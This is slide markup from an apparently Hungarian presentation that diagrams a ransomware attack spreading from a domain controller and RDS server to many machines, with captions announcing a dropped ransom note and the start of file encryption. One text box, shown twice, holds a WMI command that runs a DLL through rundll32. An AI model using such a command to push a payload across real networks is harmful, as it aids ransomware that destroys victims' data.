          <a:effectLst>
            <a:glow rad="2032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830C3B3-158D-8A20-2C5B-BBAA88D07C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9437987" y="2676525"/>
            <a:ext cx="3240082" cy="4987752"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="2032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ACF3423-0B1C-1EA0-6B34-5895342D3990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9442574" y="2676525"/>
            <a:ext cx="4958661" cy="4331527"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="2032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AB66E83-AE2B-F3F2-242A-A09329133549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9451367" y="2687800"/>
            <a:ext cx="6273390" cy="2966875"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="2032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5F18B30-06B1-0027-EA0D-F45B8FDAB355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13286213" y="3199706"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="13286213" y="3199706"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr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8815502B-7DC3-2F5B-AF84-D2583BA4C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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="13286213" y="3199706"/>
              <a:ext cx="1729827" cy="1585675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D16F1192-06BD-AF6D-7FEB-6B1A5ADA79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13778328" y="3922114"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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44D7F9D-46EF-CD4E-0F0A-D13824A41AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9458637" y="2687800"/>
            <a:ext cx="4562163" cy="1474625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="2032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0D947390-3B78-93F7-BF55-EE752C4E1495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9480973" y="2687800"/>
            <a:ext cx="6622627" cy="391257"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="2032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9F383479-6F06-1455-70E8-BB5DFB8AD38F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016600" y="1149179"/>
            <a:ext cx="14833600" cy="636529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88900">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha val="66000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="584200">
              <a:schemeClr val="tx2">
                <a:alpha val="73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glow rad="190500">
                    <a:schemeClr val="tx2">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WMI:&gt; %WINDIR%\syswow64\rundll32.exe c:\windows\COMPANY_c.dll,VisibleEntry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FB22072-562C-D399-A410-367944F1B830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6848475" y="2687800"/>
            <a:ext cx="2632498" cy="3040978"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="2032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2AD714C9-F096-59A3-819F-E23A75DC31A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6429227" y="5336491"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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2D183A21-D428-6374-FE6F-772583631B2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6815646" y="7896095"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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9B77D7C-0DEC-91CA-BA48-57A1CC20DDB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8574453" y="7913158"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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BCF2FB06-1463-1991-EA54-E49726B781D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0304059" y="7896096"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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153355B6-AE4C-C443-AA49-3F44F70EE7A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2260624" y="7266323"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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1C86376B-4BEC-E43C-2ECA-6A5DBAECB85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3989703" y="6623390"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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70D2A2F2-516F-9D30-4E51-21343CA2A8E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5340870" y="5265354"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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96AF3482-8BD4-9382-ACC9-2C20E014F63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3606570" y="3770225"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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6495FB41-D8E2-08E2-DAAA-F73B33C6E9C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5695229" y="2675036"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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D6E1B4FE-42C5-4DC8-A837-9F3E89D086F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9059154" y="2317462"/>
            <a:ext cx="836602" cy="788103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effec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F6857FA-DE09-9D8D-87F7-327763D6193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8900014" y="2046556"/>
            <a:ext cx="1049948" cy="1259938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71" name="Graphic 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4A7AB76-2CAB-513D-E53A-5FB08163A90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379874" y="7459200"/>
            <a:ext cx="2430121" cy="1886916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611CC03-152F-E333-E80C-F6FD0B247E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="71" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2809995" y="5206520"/>
            <a:ext cx="4003767" cy="3196138"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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Kép 4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392260" y="0"/>
            <a:ext cx="189574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8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100"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition advTm="2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81481E-6 L -0.14088 0.006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49" y="3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6111E-6 1.23457E-6 L 0.14401 -0.29475 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="35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96" y="-1473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19753E-6 L 0.12274 -0.54459 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="37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7" y="-27238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7284E-6 L 0.02578 -0.54629 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="39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5" y="-27315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19753E-6 L -0.06901 -0.54459 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="20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5" y="-27238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23457E-6 L -0.175 -0.47979 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="20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50" y="-23997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23457E-6 L -0.26953 -0.42083 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="2000" spd="-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81" y="-21049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32099E-6 L -0.34349 -0.28888 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="20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79" y="-14444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95062E-6 L -0.24844 -0.14351 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="200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22" y="-7176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46914E-6 L -0.36355 -0.03379 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="20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77" y="-1698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8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1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8FEBD-7108-DCCE-E2C7-51A2C755E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6BED351-106B-BA54-C29D-9D40DD53765D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702299" y="1461299"/>
            <a:ext cx="12118307" cy="827646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ACF8C00-307A-2808-B4EC-3B33B8ABF660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8435715" y="1697956"/>
            <a:ext cx="1982799" cy="2710087"/>
            <a:chOff x="4596105" y="4160260"/>
            <a:chExt cx="1982799" cy="2710087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B294A4C9-3DDC-26EB-4799-2A1FBF46E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4857524" y="4160260"/>
              <a:ext cx="1459963" cy="196648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97713CF-F7B4-3124-DC65-8907B3952ED3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4596105" y="6039350"/>
              <a:ext cx="1982799" cy="830997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  <a:t>Domain</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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  <a:t>Controller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3365263A-3372-C38C-1EF3-D79391ED07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267200" y="266700"/>
            <a:ext cx="9753600" cy="97536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EC1AB400-2673-D5A6-83DE-7580BBBBBB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6067249" y="4223963"/>
            <a:ext cx="1459963" cy="2338580"/>
            <a:chOff x="6067249" y="4223963"/>
            <a:chExt cx="1459963" cy="233858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DC3F1AF-3E34-7F61-111B-1B19E8D81AD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6067249" y="4223963"/>
              <a:ext cx="1459963" cy="2338580"/>
              <a:chOff x="4857524" y="4160260"/>
              <a:chExt cx="1459963" cy="2338580"/>
            </a:xfrm>
          </p:grpSpPr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C7D35242-AF35-1EFF-2BC7-942AF277F3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857524" y="4160260"/>
                <a:ext cx="1459963" cy="1966480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0CF38F8-A32B-9C3B-563A-FF76A8E9E9FC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4957545" y="6037175"/>
                <a:ext cx="1259919" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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424D56"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>RDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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F9CC2236-00ED-19B8-6BB4-DB44711A38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607916" y="5553702"/>
              <a:ext cx="464482" cy="566940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410099FF-58B7-6551-D1BF-7614898F7B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987994" y="7385041"/>
            <a:ext cx="1459963" cy="1966481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CA7FCA62-BD8A-13CB-5B63-179C109A59D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6440972" y="7385042"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="6440972" y="7385042"/>
            <a:chExt cx="1459963" cy="1966481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170DA8FA-414B-69D3-84FE-314AFA8EF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440972" y="7385042"/>
              <a:ext cx="1459963" cy="1966481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1CEBE609-A5A9-0FEC-3F03-FED9D9807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999429" y="8084811"/>
              <a:ext cx="464482" cy="5669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9760431-D0D4-0C12-B2BF-A90D18697738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8214483" y="7385041"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="8214483" y="7385041"/>
            <a:chExt cx="1459963" cy="1966481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3625DA85-2D4C-AE34-D7A4-841F2135E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8214483" y="7385041"/>
              <a:ext cx="1459963" cy="1966481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0831EF08-540A-F46A-3234-3D64A3095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8760513" y="8084811"/>
              <a:ext cx="464482" cy="5669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D43567A-E490-314A-DDFF-4012088821DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11858362" y="7205476"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="11858362" y="7205476"/>
            <a:chExt cx="1652602" cy="110173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FF0F96E7-D990-A5F1-08A9-31FD84E92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11858362" y="7205476"/>
              <a:ext cx="1652602" cy="1101734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15120D22-953D-FCCB-BCAB-C0CDB0A95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2446684" y="7472873"/>
              <a:ext cx="464482" cy="5669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345FD27-7E37-7ED3-A320-26CBBCD32531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13583252" y="6562543"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="13583252" y="6562543"/>
            <a:chExt cx="1652602" cy="1101734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44911374-61C0-621D-7ED7-DE6B1D6BF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13583252" y="6562543"/>
              <a:ext cx="1652602" cy="1101734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E5B86D3C-088D-7F90-97E3-CDE3A7266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4177312" y="6829940"/>
              <a:ext cx="464482" cy="5669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33326EF-78A7-E153-47B3-C5D07AD2AD28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15055789" y="4694334"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15055789" y="4694334"/>
            <a:chExt cx="1729827" cy="1585675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066E759E-CFD0-CA8D-5D82-F850B1AE9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5055789" y="4694334"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A395CE89-1CE4-22D0-5A8E-54935F5AC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5533037" y="5407540"/>
              <a:ext cx="464482" cy="56694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51D5556-E78B-84F9-B37C-7F9E13ACF9AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15421521" y="2099717"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15421521" y="2099717"/>
            <a:chExt cx="1729827" cy="1585675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2907DA69-8A99-FD88-7EA8-BC498BF6D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5421521" y="2099717"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C7DE4F05-BBCA-3F06-7A13-7F38E6A9B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5896053" y="2823564"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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05BEC4E-A9E7-A41F-05F6-667603CE946B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6848475" y="2676525"/>
            <a:ext cx="2576513" cy="2508250"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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724EFAC-6956-ADE6-1C49-E150221268B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13286213" y="3199706"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="13286213" y="3199706"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr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657FC8F6-9792-036C-9302-5A62B77E4E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3286213" y="3199706"/>
              <a:ext cx="1729827" cy="1585675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D2071993-C5EB-34E0-BFAA-365D97CFF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3778328" y="3922114"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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6B8C729-A15D-FD8A-043F-16B3EFF2D280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016600" y="1149179"/>
            <a:ext cx="14833600" cy="636529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88900">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha val="66000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="584200">
              <a:schemeClr val="tx2">
                <a:alpha val="73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glow rad="190500">
                    <a:schemeClr val="tx2">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WMI:&gt; %WINDIR%\syswow64\rundll32.exe c:\windows\COMPANY_c.dll,VisibleEntry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89FB7F9-7A5A-9DAC-0B8A-08E6545F06D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429227" y="5336491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7CD6159C-9EAF-46F8-CE73-25D68AA4E0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815646" y="7896095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8DA598BE-7E4D-ED26-ADB5-8D9144104F6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574453" y="7913158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2F32B99F-6B7C-9F52-F873-0D1CDFCD191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0304059" y="7896096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DA0EEBAB-D169-0645-1C22-329CD4B8F14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2260624" y="7266323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3FCDBF0F-CA97-9355-22AF-FA966548A50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3989703" y="6623390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D76FF04F-D9A3-75A3-518B-49E42A96B25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5340870" y="5265354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BEDFAD0F-930D-0E47-8B76-2143AB2C402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3606570" y="3770225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3F97ACA7-2EF2-E448-B118-62E2EA835F2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5695229" y="2675036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05C8DAC0-DD5C-B5EF-6C03-B6FE0F44333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9059154" y="2317462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F13B7C23-7B41-107E-0B57-140B68882DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8628233" y="4912583"/>
            <a:ext cx="5614577" cy="1200329"/>
            <a:chOff x="8878115" y="4924408"/>
            <a:chExt cx="5614577" cy="1200329"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Graphic 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418AD2F9-67C2-4CDA-47E9-382C1DD01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>
              <a:off x="8878115" y="5039933"/>
              <a:ext cx="1266949" cy="963595"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:glow rad="431800">
                <a:schemeClr val="tx2">
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:glow>
              <a:softEdge rad="0"/>
            </a:effectLst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BB4CB8A-1E0E-2F53-5A66-0EF285BC92F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10238010" y="4924408"/>
              <a:ext cx="4254682" cy="1200329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:glow>
                <a:schemeClr val="tx2"/>
              </a:glow>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="b">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="hu-HU" sz="3600" b="1" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:glow rad="431800">
                      <a:schemeClr val="tx2">
                        <a:alpha val="70000"/>
                      </a:schemeClr>
                    </a:glow>
                  </a:effectLst>
                  <a:latin typeface="Chiller" panose="04020404031007020602" pitchFamily="82" charset="0"/>
                </a:rPr>
                <a:t>Zsarolóüzenet ledobva</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="431800">
                    <a:schemeClr val="tx2">
                      <a:alpha val="70000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Chiller" panose="04020404031007020602" pitchFamily="82" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="hu-HU" sz="3600" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:glow rad="431800">
                      <a:schemeClr val="tx2">
                        <a:alpha val="70000"/>
                      </a:schemeClr>
                    </a:glow>
                  </a:effectLst>
                  <a:latin typeface="Chiller" panose="04020404031007020602" pitchFamily="82" charset="0"/>
                </a:rPr>
                <a:t>F</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="hu-HU" sz="3600" b="1" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:glow rad="431800">
                      <a:schemeClr val="tx2">
                        <a:alpha val="70000"/>
                      </a:schemeClr>
                    </a:glow>
                  </a:effectLst>
                  <a:latin typeface="Chiller" panose="04020404031007020602" pitchFamily="82" charset="0"/>
                </a:rPr>
                <a:t>ájlok titkosítása elkezdődött</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="431800">
                    <a:schemeClr val="tx2">
                      <a:alpha val="70000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Chiller" panose="04020404031007020602" pitchFamily="82" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Graphic 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7054B806-2349-2AB9-4548-B4E28ADE24C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379874" y="7459200"/>
            <a:ext cx="2430121" cy="1886916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E55F2FEB-7501-2870-4F33-8B30BEA8DBE2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2809995" y="5206520"/>
            <a:ext cx="4003767" cy="3196138"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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Kép 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392260" y="0"/>
            <a:ext cx="189574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7785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1BE3-AFAA-925F-3000-3EF9C0206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E80D39D-9303-4A9C-86A9-7968331F0E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702299" y="1461299"/>
            <a:ext cx="12118307" cy="827646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C1C289-50A6-D5DC-1A1F-94514AD10EF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8435715" y="1697956"/>
            <a:ext cx="1982799" cy="2710087"/>
            <a:chOff x="4596105" y="4160260"/>
            <a:chExt cx="1982799" cy="2710087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D00481D6-3786-3E8F-D19C-3A7D39B99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4857524" y="4160260"/>
